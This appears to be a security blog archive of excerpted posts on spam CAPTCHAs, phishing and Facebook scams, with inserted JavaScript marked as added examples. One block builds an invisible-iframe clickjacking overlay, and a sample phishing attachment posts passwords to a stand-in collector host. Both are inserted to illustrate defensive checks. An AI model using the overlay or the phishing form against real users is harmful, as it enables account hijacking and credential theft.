Spam

Chess CAPTCHA – a serious defence against spammers?

CAPTCHAs – the challenges a website asks you to complete to prove that you are a human being rather than a script – come in many shapes and forms.

Conventional CAPTCHA

Although they most commonly ask you to decipher some words hidden in a distorted graphic, there are more elaborate versions which ask you to solve a complicated mathematical calculation, or to add toppings to a pizza, in an attempt to stop automated bots from leaving spammy messages.

As a keen chess player, I was interested to see this CAPTCHA being used on an online chess forum:

Chess CAPTCHA

Okay, so it’s not much of a challenge if you’re a chess player, but it also clearly locks out any users who do not know how to play chess. (For those of you who can’t see the checkmate, the answer is upside-down at the bottom of this article – and note that Black is playing from the bottom of the board.)

But most importantly, if a CAPTCHA system like this were to become widely used, how tricky would it be for an automated bot to solve the puzzle?

IMG0893.zip – Your photo all over Facebook? Naked? Malware campaign spammed out

SophosLabs is intercepting a spammed-out malware campaign, pretending to be an email about a revealing photo posted online of the recipient.

The emails, which have a variety of subject lines and message bodies, arrive with an attached ZIP file (IMG0893.zip) which contains a Trojan horse.

Malicious email

Subject lines used in the spammed-out malware campaign include:

  • RE:Check the attachment you have to react somehow to this picture
  • FW:Check the attachment you have to react somehow to this picture
  • RE:You HAVE to check this photo in attachment man
  • RE:They killed your privacy man your photo is all over facebook! NAKED!
  • RE:Why did you put this photo online?

Subject lines used in the spammed-out malware campaign

The message bodies contained inside the email can also vary. Here are some examples:

  • Hi there ,
    I got to show you this picture in attachment. I can't tell who gave it to me sorry but this chick looks a lot like your ex-gf. But who's that dude??.
  • Hi there ,
    I have a question- have you seen this picture of yours in attachment?? Three facebook friends sent it to me today... why did you put it online? wouldn't it harm your job? what if parents see it? you must be way cooler than i thought about you man :)))).
  • Excuse me,
    But i really need to ask you - is it you at this picture in attachment? I can't tell you where I got this picture it doesn't actually matter... The question is is it really you???.

600,000+ compromised account logins every day on Facebook, official figures reveal

If an unauthorised party has logged into your Facebook account, then you’re far from alone.

New official statistics published by the social networking giant show that 0.06% of the more than a billion logins they see each day are compromised.

Put another way, that’s more than 600,000 per day – or, if you really like to make your mind melt, roughly one every 140 milliseconds (86,400,000 milliseconds in a day divided by 600,000).

Snippet of Facebook security infographic

The statistic was revealed in an infographic published alongside an official Facebook blog post trumpeting new security features introduced by the firm.

The new security features include Trusted friends (called “Guardian angels” in the infographic).

Horrible blog going around about you? Or a Twitter phishing attack?

Malicious Twitter

You may not realise it, but your Twitter account is worth money.

Cybercriminals are keen to compromise your Twitter account, so they can spam out messages (either as public tweets, or less obvious direct messages to your online friends) in the hope that some recipients will click on the links.

What lies at the end of the links can vary. It might be a webpage offering you a new wonder diet, or a pornographic website, or a link to a download designed to infect your computer.

But first they need to commandeer your Twitter account, and the simplest way for them to do this is just to ask you for your Twitter username and password.

Here’s an example of the latest attack that has been seen on Twitter. The message arrives in the form of a direct message (DM), and has a pretty enticing reason for you to click on the link:

Google’s Picasa and Yahoo! Groups used to spread spam

No spam mailbox

One of the most effective techniques anti-spam products have to block spam messages from reaching your inbox is reputation filtering.

Yes, to a degree, anti-spam solutions may still look for v1@gr@ and Mrs. Gaddafi offering you $40 million, but the biggest bang for your buck comes from reputation: mail arriving from a sender or relay with a poor track record is blocked before its content is ever examined.

So what do you do if you are a spammer? Figure out a way to get a legitimate mail provider, whose servers carry a good reputation, to deliver your messages for you…

Hurricane Irene clickjacking scam on Facebook

Hurricane Irene

States in the USA, such as Vermont and New Jersey, are continuing to deal with heavy flooding in the aftermath of Hurricane Irene.

And we weren’t surprised to find internet scammers attempting to profit from other people’s misery.

For instance, here is a clickjacking scam which at the time of writing is still active on Facebook.

Hurricane Irene Facebook clickjacking scam

This Facebook page reads:

VIDEO SHOCK - Hurricane Irene New York kills All

All? Hmm.. that would be a rather fanciful claim even for the most sensationalist tabloid report. But maybe it will be enough to make you click further.

Hurricane Irene Facebook clickjacking scam

BAM! Too late. You’ve been clickjacked. Even before you’ve had a chance to notice that the page is suddenly talking to you in Italian, the webpage has taken the click you aimed at what looked like the video’s play button and silently delivered it to an invisible Facebook “Like” button layered on top of it – registering a “Like” for the page in your name and thus promoting it to your Facebook friends.
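To make the mechanism concrete, here is an added example (not code from the original post) with the two halves of the trick: how a decoy button is hidden under an invisible framed widget, and how to check from a page’s response headers whether another origin is allowed to frame it at all, which is the precondition for clickjacking it. Every URL, origin and header set below is constructed for illustration; a Like button widget is, by design, meant to be framed by other sites, which is exactly why a browser-side guard such as NoScript is needed for it.

```javascript
// Added example, not from the original post. All origins, URLs and headers are
// constructed; none are captured from Facebook.

// The attacker's page: the iframe sits above the decoy (higher z-index) with
// opacity 0, so the visible "play" button is never clicked; the framed widget is.
function buildOverlayPage(framedUrl, decoyLabel) {
  return [
    '<div style="position:relative;width:300px;height:200px">',
    `  <button style="position:absolute;left:120px;top:80px;z-index:1">${decoyLabel}</button>`,
    `  <iframe src="${framedUrl}" scrolling="no"`,
    '    style="position:absolute;left:95px;top:75px;width:120px;height:30px;opacity:0;z-index:2;border:0"></iframe>',
    '</div>',
  ].join('\n');
}

// Source list of a CSP frame-ancestors directive, or null if the directive is absent.
function frameAncestors(cspHeader) {
  if (!cspHeader) return null;
  for (const directive of cspHeader.split(';')) {
    const tokens = directive.trim().split(/\s+/);
    if (tokens[0].toLowerCase() === 'frame-ancestors') {
      return tokens.slice(1).map(t => t.toLowerCase());
    }
  }
  return null;
}

// Does one frame-ancestors source expression match the framing origin?
// Handles "scheme:", "host", "scheme://host" and "*.host"; ports are ignored for brevity.
function sourceMatches(source, framerOrigin) {
  const [scheme, host] = framerOrigin.toLowerCase().split('://');
  if (!host) return false;
  if (/^[a-z][a-z0-9+.-]*:$/.test(source)) return source === scheme + ':';
  let srcScheme = null, srcHost = source;
  const i = source.indexOf('://');
  if (i !== -1) { srcScheme = source.slice(0, i); srcHost = source.slice(i + 3); }
  if (srcScheme && srcScheme !== scheme) return false;
  if (srcHost.startsWith('*.')) return host.endsWith(srcHost.slice(1));
  return srcHost === host;
}

// True if a document served with these headers may be loaded in an iframe on
// framerOrigin. No restriction at all means any site can clickjack it.
function canBeFramedFrom(headers, framerOrigin, targetOrigin) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = v;
  const same = framerOrigin.toLowerCase() === targetOrigin.toLowerCase();

  // When both are sent, browsers that understand frame-ancestors ignore X-Frame-Options.
  const ancestors = frameAncestors(h['content-security-policy']);
  if (ancestors !== null) {
    if (ancestors.includes("'none'")) return false;
    return ancestors.some(src =>
      src === "'self'" ? same : (src === '*' || sourceMatches(src, framerOrigin)));
  }

  const xfo = (h['x-frame-options'] || '').trim();
  if (/^deny$/i.test(xfo)) return false;
  if (/^sameorigin$/i.test(xfo)) return same;
  const allowFrom = /^allow-from\s+(\S+)/i.exec(xfo);
  if (allowFrom) {
    // Legacy syntax that was never widely honoured; treat it as advisory only.
    return allowFrom[1].replace(/\/$/, '').toLowerCase() === framerOrigin.toLowerCase();
  }
  return true;
}
```

Run `canBeFramedFrom` against the headers of any page that carries a state-changing button (Like, Share, transfer, approve): if it returns true for an arbitrary attacker origin, that page can be overlaid exactly as above, and the fix on the server side is `Content-Security-Policy: frame-ancestors 'none'` (or an explicit allow-list) with `X-Frame-Options: DENY` kept for older browsers.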

If you were running an add-on like NoScript for Firefox you would have been protected by a warning message:

Hurricane Irene Facebook clickjacking scam intercepted by NoScript

But let’s imagine that you weren’t protected. What happens next?

Hurricane Irene Facebook clickjacking scam

The page insists that you share the link to the Facebook page, presumably in an attempt to increase its viral spread. So far things don’t seem to be working well for the scammers – as only 12 people have said they “Like” the page (and one of those is my test account). Maybe folks are suspicious about a claim that Hurricane Irene has killed *everyone* in New York.

Hurricane Irene Facebook clickjacking scam

You’re still keen to watch the video, of course, but first the scammers want you to take an online survey – which not only asks you for personal information but also can earn them commission.

If you are hit by a scam like this you should remove the page from the list of pages that your Facebook profile likes..

Unlike Hurricane Irene Facebook clickjacking scam

..and remove it from your newsfeed, reporting it as spam to Facebook.

Remove Hurricane Irene Facebook clickjacking scam

The good news is that this particular scam hasn’t become widespread, but many others have.

If you’re a Facebook user and want to keep up on the latest threats and security news I would recommend you join the Sophos Facebook page - where more than 100,000 people regularly discuss the latest attacks.

UK student loans targeted by phishers in latest spam campaign

With British students about to start another year at university, the last thing they probably want to hear is that there is a problem with a student loan.

But that’s precisely the camouflage that online scammers are using to steal personal information today.

An email, claiming to come from Directgov UK, tells students that there is a problem with the online account for their student loan, and they need to update their account urgently.

Here’s a typical spammed-out message we’ve seen in our traps:

Student loan phishing attack

Subject:

Student Loan Update.

Message body:

Dear Student Finance Customer.

We at HM Government noticed your Student loan online log in details is incorrect and need to be updated.

DOWNLOAD THE ATTACHMENT TO UPDATE YOUR ACCOUNT NOW

Regards
Inline Verification. Directgov UK.

Attached file:

Student Loan Update.html

Opening the HTML attachment is not a good idea, however: it displays a form that urges you to enter your details, and the form then posts them to a website run by the phishers. Because the form itself arrives inside the email rather than on a web page, the attachment gives the phishers a login page that no URL-reputation filter has ever seen.

Student loan phishing attack

Sophos products block the message as spam, and block the webpage to which the HTML form attempts to post the personal information.
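The same check can be made at a mail gateway before the attachment ever reaches a student. The following is an added example, not code from the original post and not how any Sophos product works: it extracts each form from an HTML attachment, keeps the ones that ask for a password, and reports whether they post outside the domain the message claims to come from. The attachment text is constructed to mimic this lure, and the collector host “example-collector.invalid” is made up.

```javascript
// Added example, not from the original post or any vendor product. The
// attachment below is constructed; "example-collector.invalid" is a made-up host.

const SAMPLE_ATTACHMENT = `<html><body>
<h2>Student Loan Update</h2>
<form method="post" action="http://example-collector.invalid/sfe/verify.php">
  Customer Reference Number <input name="crn">
  Password <input type="password" name="password">
  Secret answer <input type="password" name="secret">
  <input type="submit" value="Update account">
</form>
<form action="https://www.direct.gov.uk/search"><input name="q"></form>
</body></html>`;

// The domain the message claims to come from (the lure says Directgov / HM
// Government). A real gateway would derive this from the From: header or a brand list.
const CLAIMED_DOMAIN = 'direct.gov.uk';

function hostBelongsTo(host, domain) {
  host = host.toLowerCase(); domain = domain.toLowerCase();
  return host === domain || host.endsWith('.' + domain);
}

// Regex extraction is enough for the flat pages phishers ship; it is not an HTML parser.
function extractForms(html) {
  const forms = [];
  const formRe = /<form\b([^>]*)>([\s\S]*?)<\/form>/gi;
  let m;
  while ((m = formRe.exec(html)) !== null) {
    const action = /\baction\s*=\s*["']?([^"'\s>]+)/i.exec(m[1]);
    const passwordFields = (m[2].match(/<input\b[^>]*\btype\s*=\s*["']?password/gi) || []).length;
    forms.push({ action: action ? action[1] : null, passwordFields });
  }
  return forms;
}

// Any password form inside an e-mail attachment is worth flagging; one that posts
// to a host outside the claimed domain is the classic credential-harvesting pattern.
function findCredentialForms(html, claimedDomain) {
  const findings = [];
  for (const f of extractForms(html)) {
    if (f.passwordFields === 0) continue;
    let host = null;
    try { host = new URL(f.action).hostname; } catch (e) { /* relative or missing action */ }
    findings.push({
      action: f.action,
      host,
      passwordFields: f.passwordFields,
      offDomain: host !== null && !hostBelongsTo(host, claimedDomain),
    });
  }
  return findings;
}
```

On the sample above the scanner returns one finding: a two-password-field form posting to example-collector.invalid, which is off-domain for direct.gov.uk. The second form (a search box with no password field) is ignored, which keeps the check quiet on ordinary HTML newsletters.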

Remember to always be suspicious of unsolicited attachments. Also, I would hope that a good student would have noticed the grammatical mistakes in the phisher’s email.

Pictures of Osama Bin Laden phishing attack hits Twitter users

Phishers are once again on the prowl for unsuspecting Twitter users, tempting their prey with the promise of pictures of Osama Bin Laden.

Pictures of Osama Bin Laden

Pictures of Osama Bin Laden [LINK]

Some of the compromised accounts sending these messages had earlier posted a similar message (complete with some rather sloppy spelling):

Pics of Osama Bin Laden Are Finally Released! [LINK] ::wanring very gorry::

Clicking on the links takes you to what appears to be the normal Twitter login page.

Fake Twitter login page

Would you enter your username and password at this point?

Take a close look at the URL before you make that decision.

Pictures of Osama Bin Laden phishing url

Hopefully you notice that it’s not the real Twitter URL – it’s a phishing site set up to steal your username and password.
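The “take a close look at the URL” advice above can be turned into a check you run before typing a password anywhere. The following is an added example, not code from the original post: it takes the URL of a page that claims to be a login page for a given domain and explains why the host is not what it appears to be, covering the tricks phishers lean on (the brand name placed before an “@”, the brand as a leading subdomain of an unrelated host, visually similar spellings, punycode labels, raw IP addresses and plain http). All sample URLs are constructed and “evil.example” is a made-up host.

```javascript
// Added example, not from the original post. Sample URLs are constructed;
// "evil.example" is a made-up host.

// Common visual substitutions, so that "tvvitter" compares equal to "twitter".
const LOOKALIKE_SWAPS = [[/vv/g, 'w'], [/rn/g, 'm'], [/1/g, 'l'], [/0/g, 'o']];

function normalizeLabel(label) {
  return LOOKALIKE_SWAPS.reduce((s, [re, to]) => s.replace(re, to), label);
}

// Is this URL a genuine login page for expectedDomain? If not, say what is off
// about it. Only the host decides: path, query and page title are attacker-controlled.
function classifyLoginUrl(raw, expectedDomain) {
  const u = new URL(raw);
  const host = u.hostname.toLowerCase();
  const genuine = host === expectedDomain || host.endsWith('.' + expectedDomain);
  const reasons = [];
  if (genuine) return { host, genuine, reasons };

  const brand = expectedDomain.split('.')[0];
  const labels = host.split('.');
  if (u.username) {
    reasons.push(`text before "@" (${u.username}) is not the host; the real host is ${host}`);
  }
  if (host.includes(expectedDomain)) {
    reasons.push(`"${expectedDomain}" appears inside the host but is not its domain`);
  } else if (labels.some(l => l !== brand && normalizeLabel(l) === brand)) {
    reasons.push(`a host label resembles "${brand}" through character substitution`);
  } else if (host.includes(brand)) {
    reasons.push(`brand name "${brand}" used in an unrelated host`);
  }
  if (labels.some(l => l.startsWith('xn--'))) reasons.push('internationalised (punycode) host label');
  if (/^\d{1,3}(\.\d{1,3}){3}$/.test(host)) reasons.push('raw IP address instead of a hostname');
  if (u.protocol !== 'https:') reasons.push('login page not served over https');
  if (reasons.length === 0) reasons.push(`host is not under ${expectedDomain}`);
  return { host, genuine, reasons };
}
```

The important line is the one that computes `genuine`: only the hostname, compared against the expected registrable domain, matters. Everything else the phisher can make look right, including the word “twitter” in the path, in a subdomain, or before an “@”.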

If you make the mistake of entering your username and password, then you will be handing the keys to your account to phishers, who would then be able to use it to read your private messages and send messages (perhaps spam-related or containing malicious links) to your followers.

Worst of all, if you’re one of those people who uses the same password on Twitter as you use elsewhere on the internet, you’ve now told the cybercriminals how to access, for example, your Gmail, Hotmail or PayPal accounts as well.

If you found your Twitter account was one of those sending out the phishing messages, or if you made the mistake of entering your username and password, then you must change your password as soon as possible.

Not just on Twitter, but also make sure you’re not using the same password anywhere else on the net. You have to consider that password compromised.

There’s some other house-cleaning you should do on your Twitter account too. Visit the Applications tab in “Account Settings”, and revoke access for any third-party application that you don’t recognise.

Your Facebook Profile Stalkers exposed? No, it’s a rogue application spreading virally

Messages are spreading rapidly on Facebook claiming to reveal a way to find out who has been secretly viewing your profile.

Here are a couple of examples:

Profile stalkers on Facebook

Brilliant!! Now u can see all your profile stalkers! --> [LINK]

and

Profile stalkers on Facebook

WOW!! I can't believe that you can see whose viewing your profile. I've just seen my top 10 profile peekers and I'm shocked on whose Viewing my Profile. You can also see whose viewing your FACEBOOK PROFILE HERE: [LINK]

Clicking on the links takes you to a splash screen for a rogue application, where the promise of discovering who has been viewing your Facebook profile is used to fool you into giving a third-party application permission to access your account.

Profile stalkers on Facebook

Want to see who views your Facebook profile?

This is amazing!

Now you can see who is viewing your profile and find out how many profile views you got. Just use our application and press button below and then Allow to analyze your Facebook profile!

Obviously you shouldn’t grant permission on the following screen for the application to access your Facebook profile, but an alarming number of users appear to have no qualms about exposing their confidential information and degrading their security in this way.

Profile stalkers on Facebook

The problem is that this isn’t a legitimate application request. A rogue application wants access to your account so it can spread the messages and its link even further, spreading the campaign virally across the social network. The goal? To earn money by driving traffic to an online survey.

Profile stalkers on Facebook

Notice that the survey presents itself in a convincing Facebook style, which may trick some users into believing that it is legitimate.

If you’ve been affected by this scam, you should clean up your account before any further damage is done.

I’ve made a YouTube video where I show you how to clean up your Facebook account if you were hit by this or similar scams on Facebook:

(Enjoy this video? You can check out more on the SophosLabs YouTube channel and subscribe if you like)

Make sure that you stay informed about the latest scams spreading fast across Facebook and other internet attacks. Join the Sophos Facebook page, where more than 100,000 people regularly share information on threats and discuss the latest security news.

You could also do a lot worse than check out our best practices for better privacy and security on Facebook guide.